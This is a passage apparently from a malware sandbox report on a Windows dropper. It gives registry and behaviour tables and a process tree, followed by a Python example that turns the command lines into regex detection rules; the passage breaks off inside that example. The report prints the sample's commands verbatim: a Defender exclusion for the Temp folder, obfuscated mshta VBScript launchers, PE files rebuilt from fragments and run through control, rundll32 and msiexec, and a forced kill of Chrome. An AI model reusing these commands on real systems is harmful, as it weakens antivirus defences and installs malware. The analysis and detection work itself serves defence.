| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe
"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe
Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe
Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe
Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe
Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe
Fri20ee0a6fe195bd09.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe
Fri209f6924af86d795.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe
Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe
Fri20d5530575e8aa3ed.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe
Fri208f5f140853548.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe
Fri20e095683c2b3a0c.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe
Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe
Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe
Fri2060ea1c5d8fae8aa.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4604 -ip 4604
C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$50278,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 612
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe
"C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$20266,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 620
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM "Fri20ba391d4469.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Fri208f5f140853548.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4212 -ip 4212
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 640
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 "=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 660
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct( "WscRiPt.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT +lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4212 -ip 4212
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT+lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 780
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\msiexec.exe
msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 784
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffec215cc40,0x7ffec215cc4c,0x7ffec215cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2072,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2056 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2256 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri200ae385720d3.exe
Fri200ae385720d3.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 640
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4060 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1400
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5104,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5116 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
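The process list above and the Network table that follows are the two sections of this report an analyst actually works from. The block below is an added example, not sandbox output and not part of the report: it turns both into machine-checkable findings. The command lines and table rows embedded in it are copied from this report; the rule names, regular expressions, the list of abused services and the browser-noise allowlist are the example's own assumptions. One network row is kept in the shifted-column form the page extraction produced (protocol pushed into the Domain column) so the parser's handling of that artifact is exercised.

```python
"""Turn the Processes and Network sections of a sandbox report into findings.

Added example. Command lines and table rows are copied from this report; all
rules, regexes and allowlists are the example's own assumptions.
"""
import re

# Copied from the Processes section (subset). The last entry is a benign Chrome
# child process, included as a negative control.
SAMPLE_CMDLINES = [
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    r'"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )',
    r'"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I',
    r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I',
    r'msiexec /Y .\6~iPCLZ.rJ',
    r'taskkill /f /im chrome.exe',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear',
]

# Case-insensitive on purpose: the loader randomises letter case (VbsCRiPT, CoPY /b /Y)
# precisely to defeat case-sensitive string matching. Rule names are this example's own.
RULES = {
    "defender_exclusion": re.compile(r"add-mppreference[\s\S]*-exclusion(?:path|process|extension)", re.I),
    "mshta_inline_script": re.compile(r'mshta(?:\.exe)?"?\s+(?:vbscript|javascript):', re.I),
    "mz_stub_concat": re.compile(r'set\s*/p\s*=\s*"?mz"?[\s\S]*copy\s*/b', re.I),  # PE rebuilt from fragments
    "copy_rename_execute": re.compile(r"copy\s+/y\b[\s\S]*&&\s*start\b", re.I),    # copy, run, kill original
    "cpl_loader": re.compile(r"(?:^|\s)control(?:\.exe)?\s+\S+|control_rundll", re.I),  # file loaded as .cpl
    "msiexec_dll_reg": re.compile(r"msiexec(?:\.exe)?\s+/y\b", re.I),                  # /y = DllRegisterServer
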